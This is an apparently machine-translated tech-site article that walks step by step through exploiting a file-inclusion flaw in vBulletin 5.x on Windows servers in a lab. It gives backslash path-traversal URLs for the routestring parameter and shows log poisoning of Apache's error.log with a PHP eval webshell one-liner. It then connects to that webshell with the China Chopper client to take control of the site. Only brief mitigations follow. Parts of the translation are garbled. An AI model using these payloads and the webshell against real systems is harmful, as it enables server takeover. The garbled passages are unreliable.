Shulou(Shulou.com)05/31 Report--

This article shows you an example analysis of remote code execution vulnerabilities in the vBulletin5.x version, which is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

I. introduction of loopholes

There is a file inclusion issue in vBulletin that allows malicious visitors to include files from the vBulletin server and execute arbitrary PHP code. An unauthenticated malicious visitor can trigger a file inclusion vulnerability by issuing an GET request to index.php that contains a routestring= parameter, which eventually leads to a remote code execution vulnerability

Second, loophole principle

When the index.php page sends a GET request to include the local file with the routestring parameter, layers of functions are called to filter the value of the routestring. Let's look at the main processing code.

The code is located in the / includes/vb5/frontend/routing.php file

If (strlen ($path) > 2) {$ext = strtolower (substr ($path,-4)) If (($ext = = '.gif') OR ($ext = = '.png') OR ($ext = = '.jpg') OR ($ext = = '.css') OR (strtolower (substr ($path,-3)) = = '.js') {header ("HTTP/1.0 404 Not Found"); die ('');}}

This code determines whether the value obtained by routestring ends with .gif, .png, .jpg, .css or .js. If so, the header information returns 404.

If (strpos ($path,'/') = = false) {$this- > controller = 'relay'; $this- > action =' legacy'; $this- > template =''; $this- > arguments = array ($path); $this- > queryParameters = array (); return;}

In this code, the strpos () function returns the position where the / character first appears in $path. If the return message is false, the processing will continue, that is, the / cannot appear in the path.

For Linux servers, when dealing with URL, / represents the separations and representations of the directory layer, so there is no way to include other files in the site as multiple.. /. However, for the Windows server, / and\ are equivalent when expressing the path, and the program does not deal with\, so the file for the Windows server contains vulnerabilities this time.

Affect the version

Version number vBulletin v5.x version vulnerability discoverer has contacted the manufacturer and has not received a reply.

III. Vulnerability exploitation

In the next practical part, we will gradually deepen the understanding and exploitation of the vulnerability, first using the page to report errors to obtain the relevant information about the server; then include the internal files of the server to execute the phpinfo () verification code execution; and finally include the website log file written to PHP to obtain the website management rights.

Step 1 vulnerability verification

In this step, we simply use the error report to obtain server information, and then exploit the vulnerability to include the execution of the phpinfo () function for verification

1. Open the target URL 172.16.12.2/vb5/index.php, and the home page of the website is as follows:

two。 Visit the vulnerability page to view error messages

Open 172.16.12.2Universe vb5max index.phpause routestringindex.\\ in the browser, and the error message is as follows:

You can see that the page is not allowed to report an error when using require_once () to include the current path (C:\ phpstudy\ WWW\ vb5/core/.\\), the error message reveals the absolute path of the website, and the website construction software: phpstudy

When phpstudy builds a website, the l.php and phpinfo.php files will be left in the root directory of the website by default. Usually, the webmaster will delete or modify these two files because\ still has the meaning of escape, and the path is equivalent to\\, so we use\\ to prevent escape (this experiment can also be completed)

3. Access phpinfo.txt files

Here, in order to verify that the vulnerability is included, there is a phpinfo.txt file in the root directory of the website, which says, we try to access the file directly, http://172.16.12.2/phpinfo.txt

The website displays the text content directly.

4. Include phpinfo.txt files

We then try to include the file and open the constructed link http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\WWW\\phpinfo.txt

Here we already know the absolute path of the website on the server, so we use multiple..\ plus file paths to indicate the site path of the included file. After including the file, the server parses the file as a php file and executes the phpinfo () function.

Phpinfo (): PHP built-in function that outputs the configuration information of the PHP server

Step 2 vulnerability exploitation

In general, the way to exploit vulnerabilities in PHP files is to use the upload point of the website to upload files containing malicious code, then find the path of the uploaded files, construct URL, and execute malicious code by including vulnerabilities. However, this method will not work if the site itself has no upload points, or if there are restrictions on uploaded files, so that we cannot know the path of the file, or filter the parameters obtained during input.

As can be seen from the above, the program has made restrictions on the included file suffixes. In the case of no other use, we can choose to include the files that exist in the website itself, that is, the way to use this experiment: include the website log files.

This time it contains the error access log (error.log) of Apache. The path of this log file in phpstudy is:\ phpstudy\ apache\ logs\ error.log.

1. Write a sentence to the log record

First, we construct an error-prone access link and write the code (PHP one sentence) to the error log record.

Http://172.16.12.2/vb5/index.php

If this link is accessed directly, a sentence will be encoded as% 3C?php%20@eval ($_ post [c]);?% 3e, so you need to change the package using Burp suite.

Search for BurpLoader.jar using Everything, and double-click to open the tool Burp suite.

Configure the proxy settings for the browser:

Open the desktop chrome browser, visit chrome://settings or click the custom button on the right side of the browser-"Settings" to enter the settings interface

Click the display Advanced Settings below, find the change proxy Settings button and open it, and select the LAN Settings in the pop-up settings.

The specific configuration is shown in the following figure, which is determined after modification.

After configuring the proxy, visit the link constructed above in the browser, Burpsuite will automatically intercept the packet received, open Burpsuite-- "proxy--" Intercept, in the text box below, right-click and select Send to Repeater, and then click the Repeter function button to modify the intercepted packet.

We change the encoded link back to its pre-coding state, and the modified content is as follows:

Click the Go button to send, return 403 error report, the server error log file will successfully record this to error.log

We have successfully written the utilization code to the log.

Note that taking advantage of the correctness of the code, if writing the wrong code may result in subsequent inclusion, the code cannot be executed successfully

Now, close Burpsuite and close the agent the way you set the browser proxy above

two。 Construct Webshell connection address

We construct the access path according to the path of the log:

Http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\apache\\logs\\error.log

One sentence of client connection

Next, use the Chinese kitchen knife to connect to our sentence, use Everything to search and open chopper, right-click, select add, fill in the link we have constructed in the address bar, write password c on the right, select PHP (Eval), and then click add.

Double-click the link, and the connection is successful (if the connection is not available here, please check whether the written code is correct and whether the agent is closed)

Including the log file needs to determine the server log path, usually the administrator will modify the relevant configuration, and pay attention to the strict format and coding when writing the code, so this method is not the preferred utilization method, but it is also a repair scheme that can be tried in the absence of other utilization points.

(1) waiting for the official release of the patch, individual users suggest using alternative related products.

(2) Enterprise users can modify the source code of the website and add filtering processing of\ characters.

(3) website managers can modify the location of sensitive information files on the server itself to avoid further exploitation of vulnerabilities.

The above is an example analysis of remote code execution vulnerabilities in vBulletin5.x version. have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.